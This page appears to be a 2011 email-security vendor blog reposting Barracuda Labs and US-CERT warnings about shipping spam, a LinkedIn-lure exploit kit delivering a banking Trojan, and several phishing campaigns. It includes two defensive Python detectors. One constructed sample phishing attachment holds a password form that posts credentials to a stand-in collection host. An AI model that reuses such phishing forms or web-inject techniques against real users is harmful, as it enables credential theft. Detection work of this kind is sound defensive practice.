Tuesday, November 15, 2011

Shipping Related Spam Increase for the Holidays

At CudaMail, we've noticed lately that the recent wave of "shipping-related" spam has been increasing. You know the ones - "Package Tracking Details", "Fedex Shipment Details" or "Express Tracking Notification". If you regularly deal with these companies it may not come as a surprise, but if you're not expecting a shipment, you may be tempted to click on the links to check this "shipment". As usual, it's a good idea not to click the links! Try logging into your account on their actual website, or call them to check. With the coming holidays, it's only natural to expect some shipments - and the spammers are taking advantage of this, even dropping names like "Amazon" or major store names to try and lure you to click on their links and load their malware on your computer. Take care when reading these emails, and be careful what you click on.

Tuesday, August 30, 2011

How a LinkedIn notice could empty your bank account

An interesting article from BarracudaLabs. We've all seen notices from "LinkedIn, Facebook, Bank of America" etc. trying to make their way into people's email inboxes.
Like any email, we always suggest you make sure you know what you're clicking on before you click on it!
Some people have been learning the hard way with the latest "Linked In" malware delivery email campaigns.
Those behind the CudaMail system are protected from these types of campaigns.
Here's the Original Story:
By Dave Michmerhuizen & Luis Chapetti – Security Researchers

We see a lot of spam at Barracuda Labs. Sometimes they're as simple and straightforward as a Viagra ad, but just as often they can be as serious and as devastating as an urban mugging. We've been watching one of those muggings play out over the past few days, and it has reminded us that spam is nothing to take lightly.

Early on the morning of August 23 the spam monitors at Barracuda Labs started detecting a large number of emails claiming to be from LinkedIn. The quantities were significant, tens of thousands an hour, and these were pretty convincing messages.

[Image: LinkedIn spam]

As convincing as they may be, these emails have nothing to do with LinkedIn. The from address is fake and the "Follow this link" hyperlink leads to one of a set of recently registered domains deliberately set up to serve malicious content.

[Image: LinkedIn spam]

Most of these sorts of spam attacks simply link to a malware file which the browser then downloads and offers to run. If an antivirus doesn't intercept such a file then Windows will ask for permission to run it and it is easy enough to say no. But this attack is different and much more serious. Each of the malicious domains such as linkedin-reports.com or linkedin-alert.com hosts an exploit kit, a set of malicious payloads that quietly attempt to take advantage of weaknesses in the Web browser and its helper applications. Clicking on the "follow this link" hyperlink in the message doesn't appear to have any effect. Nothing seems to happen; however there is a lot going on behind the scenes. Below is what the behind-the-scenes network traffic looked like.

[Image: Network traffic of exploits]
This traffic capture shows a series of attacks against Internet Explorer (1), against the Adobe PDF reader plug-in (2) and finally against Windows Media Player (3).  Eventually these exploits result in the download of Trojan.Jorik (4). Trojan.Jorik is a password stealer which gets right to work, periodically checking in with its command and control server (5). After contacting the control server the Trojan contacts another server (6) for an interesting – and somewhat scary – configuration file.
[Image: Configuration update with phishing HTML]

These password-stealing Trojans are programmed to insert themselves into the browser stack and can intercept login pages even before they are encrypted by HTTPS. The list above shows the services that the Trojan is being configured to monitor. There is more configuration that is not shown in this graphic – pages of HTML code snippets to be injected into login pages. When a login page for one of the monitored sites is displayed, the corresponding code snippet is added to the page. These code snippets ask for additional security questions or special passwords, information the password thieves want but questions that the legitimate login page does not ask.

Having your online banking credentials stolen is serious stuff, especially if the credentials belong to an organization or business with a hefty bank balance. Consider the most recent story from Brian Krebs about the Cyber Theft of $217,000 from a nonprofit in Nebraska.

With so much spam circulating through email servers worldwide, it is easy to become insensitive to the very real danger that truly malicious spam poses. Never let down your guard, and never ever follow links in emails even if they appear to be official looking. As you can see from this example, one click can be all it takes.
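The web-inject mechanism the article describes leaves a detectable trace from the site owner's side: the injected snippet adds form fields the genuine login page never shipped. The following added example (written for this post; not Barracuda Labs' or CudaMail's code, and not based on any real bank) shows the check a page-integrity script can run over the HTML the browser actually renders: collect every named control inside the form and diff it against an allowlist of the fields the real page is known to contain. The allowlist, the clean page and the injected page are all constructed samples.

```python
"""Flag form fields a web inject added to a login page (added example, constructed data)."""
from html.parser import HTMLParser

# Constructed allowlist: the only fields the genuine login form contains.
EXPECTED_LOGIN_FIELDS = {"username", "password", "csrf_token"}


class FormFieldCollector(HTMLParser):
    """Collects the name of every data-carrying control inside <form> elements."""

    def __init__(self):
        super().__init__()
        self.depth = 0      # > 0 while inside a <form>
        self.fields = []

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            self.depth += 1
        elif self.depth and tag in ("input", "select", "textarea"):
            # Buttons carry no user data, so they are not part of the comparison.
            if (attrs.get("type") or "text").lower() not in ("submit", "button", "reset", "image"):
                name = attrs.get("name")
                if name:
                    self.fields.append(name)

    def handle_endtag(self, tag):
        if tag == "form" and self.depth:
            self.depth -= 1


def form_field_names(html):
    """Set of control names found inside the page's forms."""
    parser = FormFieldCollector()
    parser.feed(html)
    parser.close()
    return set(parser.fields)


def injected_fields(html, expected=EXPECTED_LOGIN_FIELDS):
    """Field names present in the page but absent from the allowlist, sorted."""
    return sorted(form_field_names(html) - set(expected))


# Constructed sample: the login page exactly as the site serves it.
CLEAN_PAGE = """
<form action="/login" method="post">
  <input type="hidden" name="csrf_token" value="abc">
  <label>User <input name="username"></label>
  <label>Password <input type="password" name="password"></label>
  <input type="submit" value="Sign in">
</form>
"""

# Constructed sample: the same page after a web inject spliced in extra questions.
INJECTED_PAGE = CLEAN_PAGE.replace(
    '<input type="submit"',
    '<label>ATM PIN <input type="password" name="atm_pin"></label>\n'
    '<label>Mother\'s maiden name <input name="security_answer"></label>\n'
    '<input type="submit"',
)

if __name__ == "__main__":
    for label, page in (("clean", CLEAN_PAGE), ("injected", INJECTED_PAGE)):
        extra = injected_fields(page)
        print(f"{label}: {'OK' if not extra else 'unexpected fields: ' + ', '.join(extra)}")
```

The comparison has to run on the DOM the browser renders, not on the HTML the server sent, because the Trojan modifies the page after it has been decrypted inside the browser; the server-side copy always looks clean.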


Thursday, June 23, 2011

Top 5 Things to Know Before Choosing a Spam Filtering Service

There's a new guide available on CudaMail.com that talks about things you need to know before choosing a spam filtering service. Some firms do their own spam and virus filtering with an appliance like the Barracuda Spam & Virus Firewall. However, some don't have their own I.T. resources, or simply don't want to manage their own appliance. That's the advantage of a "Cloud-Based" spam filtering service - it's set up for you, and managed for you. You also don't have to bother with updating spam definitions or other subscriptions. There are several services available on the web, but it's important to ask yourself some questions like: Is it important to be able to contact them (and talk to a live person) easily? Can I add people to my whitelist or blacklist? It's a free downloadable guide, so if you want to get some tips on choosing a spam filtering service, you can check it out easily. There's an opt-in form on the top right of the site, and after confirming with AWeber, you get a link to the guide.

Thursday, June 2, 2011

US-Cert Reports Gmail Phishing Attack

US-CERT recently published an article about a new phishing attack, which is aimed at specific targets in the US Government.

The Story:

US-CERT is aware of public reports of a phishing attack that specifically targets US government and military officials' Gmail accounts. The attack arrives via an email sent from a spoofed address of an individual or agency known to the targeted user. The email contains a "view download" link that leads to a fake Gmail login page. The login information is then sent to an attacker. Google has indicated that this phishing campaign has been disrupted and that affected parties have been notified.

US-CERT encourages users and administrators to do the following to help mitigate the risks:

  • Review the Google blog entry Ensuring your information is safe online.
  • Do not follow unsolicited web links or attachments in email messages.
  • Use caution when providing personal information online.
  • Verify the legitimacy of the email by contacting the organization directly through a trusted contact method.
  • Refer to the Recognizing and Avoiding Email Scams (pdf) document for more information on avoiding email scams.
  • Refer to the Avoiding Social Engineering and Phishing Attacks document for more information on social engineering attacks.
  • Refer to the Using Caution with Email Attachments document for more information on safely handling email attachments.

Relevant Url(s):

http://www.us-cert.gov/cas/tips/ST04-014.html
http://www.us-cert.gov/reading_room/emailscams_0905.pdf
http://googleblog.blogspot.com/2011/06/ensuring-your-information-is-safe.html
http://www.us-cert.gov/cas/tips/ST04-010.html

Original Article: http://www.us-cert.gov/current/index.html#gmail_phishing_attack



Friday, March 18, 2011

Ongoing Phishing Attack targeting PayPal, Bank of America, Lloyds and TSB

This new story by US-CERT shows they have become aware of reports of a new phishing attack. Apparently it's bypassing some of the new phishing protection built into many browsers. The team at CudaMail have also noted the new campaign (fortunately, with a global network of 100,000 spam firewalls feeding "zero hour" threat information to the reputation database, it begins thwarting such campaigns very early), and have been successfully blocking it.

The US-CERT Story:

US-CERT is aware of public reports of an ongoing phishing attack. At this time, this attack appears to be targeting PayPal, Bank of America, Lloyds, and TSB users. The attack arrives via an unsolicited email message containing an HTML attachment.

[Image: Email Phishing Scams]

This attack is unlike common phishing attacks because it locally stores the malicious webpage rather than directing the user to a phishing site via a URL. Many browsers utilize anti-phishing filters to help protect users against phishing attacks; this method of attack is able to bypass this security mechanism. US-CERT encourages users and administrators to take the following measures to protect themselves from these types of phishing attacks:
  • Do not follow unsolicited web links or attachments in email messages.
  • Use caution when providing personal information online.
  • Verify the legitimacy of the email by contacting the organization directly through a trusted contact method.
Relevant Url(s): Link to the original story.
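Both this alert and the shipping-spam post at the top of the page describe lures that a mail gateway can recognise from the message itself: the HTML-attachment phish never makes the browser fetch a URL, so URL reputation and browser anti-phishing filters never see the fake login page, while the shipping lure relies on link text that names a trusted brand although the href points somewhere else. The following added example (written for this page; not US-CERT's or CudaMail's code) parses an .eml with Python's standard `email` and `html.parser` modules and flags (a) HTML attachments that contain a password form and (b) links whose visible text names a different domain than the real target. The two messages and every domain in them are constructed samples using the reserved `.example` TLD.

```python
"""Mail triage for HTML-attachment phishing and deceptive links (added example, constructed data)."""
import email
from email import policy
from html.parser import HTMLParser
from urllib.parse import urlparse


class HtmlSignals(HTMLParser):
    """Records form actions, whether a password box exists, and each anchor's href and text."""

    def __init__(self):
        super().__init__()
        self.form_actions, self.has_password_input, self.links = [], False, []
        self._href, self._text = None, []

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            self.form_actions.append(attrs.get("action") or "")
        elif tag == "input" and (attrs.get("type") or "").lower() == "password":
            self.has_password_input = True
        elif tag == "a" and attrs.get("href"):
            self._href, self._text = attrs["href"], []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def signals(html):
    parser = HtmlSignals()
    parser.feed(html)
    parser.close()
    return parser


def host_of(url):
    return (urlparse(url).hostname or "").lower()


def base_domain(host):
    """Last two labels of a hostname; a rough stand-in for the registrable domain."""
    return ".".join(host.split(".")[-2:])


def shown_host(text):
    """Host named by the visible link text when it looks like a URL or hostname, else ''."""
    t = text.strip()
    if not t or " " in t or "." not in t:
        return ""
    host = host_of(t if "://" in t else "http://" + t)
    return host if host.rsplit(".", 1)[-1].isalpha() else ""


def parse(raw):
    return email.message_from_string(raw, policy=policy.default)


def credential_form_attachments(msg):
    """(filename, form-action hosts) for each HTML attachment that contains a password form."""
    found = []
    for part in msg.iter_attachments():
        if part.get_content_type() == "text/html":
            s = signals(part.get_content())
            if s.has_password_input and s.form_actions:
                found.append((part.get_filename(), [host_of(a) for a in s.form_actions]))
    return found


def deceptive_links(msg):
    """(visible text, real host) for body links whose text names a different domain than the href."""
    body = msg.get_body(preferencelist=("html",))
    if body is None:
        return []
    out = []
    for href, text in signals(body.get_content()).links:
        shown, real = shown_host(text), host_of(href)
        if shown and real and base_domain(shown) != base_domain(real):
            out.append((text, real))
    return out


# Constructed sample: the login form travels inside the message, so no URL is ever visited.
ATTACHMENT_PHISH = """\
From: "PayPal Service" <service@paypal-notice.example>
Subject: Your account has been limited
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/html; charset="us-ascii"
Content-Disposition: attachment; filename="restore.html"

<html><body><form method="post" action="http://account-restore.example/collect.php">
<input name="email"><input type="password" name="pass"><input type="submit"></form></body></html>
--b1--
"""

# Constructed sample: shipping lure whose link text names the courier but the href does not.
SHIPPING_LURE = """\
From: "FedEx Tracking" <noreply@shipping-notice.example>
Subject: Fedex Shipment Details
Content-Type: text/html; charset="us-ascii"

<html><body>Track your package: <a href="http://tracking-update.example/go">www.fedex.com/tracking</a></body></html>
"""
```

Running `credential_form_attachments(parse(ATTACHMENT_PHISH))` reports the `restore.html` attachment posting to `account-restore.example`, and `deceptive_links(parse(SHIPPING_LURE))` reports the `www.fedex.com/tracking` text resolving to `tracking-update.example`. The `base_domain` helper is deliberately crude (it treats the last two labels as the owner); a production filter would use the public suffix list so that hosts under multi-label suffixes are compared correctly.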

Tuesday, March 15, 2011

Japan Earthquake and Tsunami Email Scams

We see it all the time. Spammers and malware writers try to exploit all kinds of traumas and disasters. The recent earthquake and tsunami disasters in Japan are no exception - so the anti-spam community should be prepared for the onslaught.

US-CERT recently posted a warning about impending Phishing and Malware email scams regarding Japan's recent earthquake and the resulting tsunami disaster:

- original story below:

US-CERT Current Activity

Japan Earthquake and Tsunami Disaster Email Scams, Fake Antivirus and Phishing Attack Warning

Original release date: March 11, 2011 at 10:14 am
Last revised: March 11, 2011 at 10:14 am

US-CERT would like to warn users of potential email scams, fake antivirus and phishing attacks regarding the Japan earthquake and the tsunami disasters. Email scams may contain links or attachments which may direct users to phishing or malware-laden websites. Fake antivirus attacks may come in the form of pop-ups which flash security warnings and ask the user for credit card information. Phishing emails and websites requesting donations for bogus charitable organizations commonly appear after these types of natural disasters.

US-CERT encourages users to take the following measures to protect themselves:

  • Do not follow unsolicited web links or attachments in email messages.
  • Maintain up-to-date antivirus software.
  • Review the Federal Trade Commission's Charity Checklist.

Verify the legitimacy of the email by contacting the organization directly through a trusted contact number. Trusted contact information can be found on the Better Business Bureau National Charity Report Index.

You can find the original story here.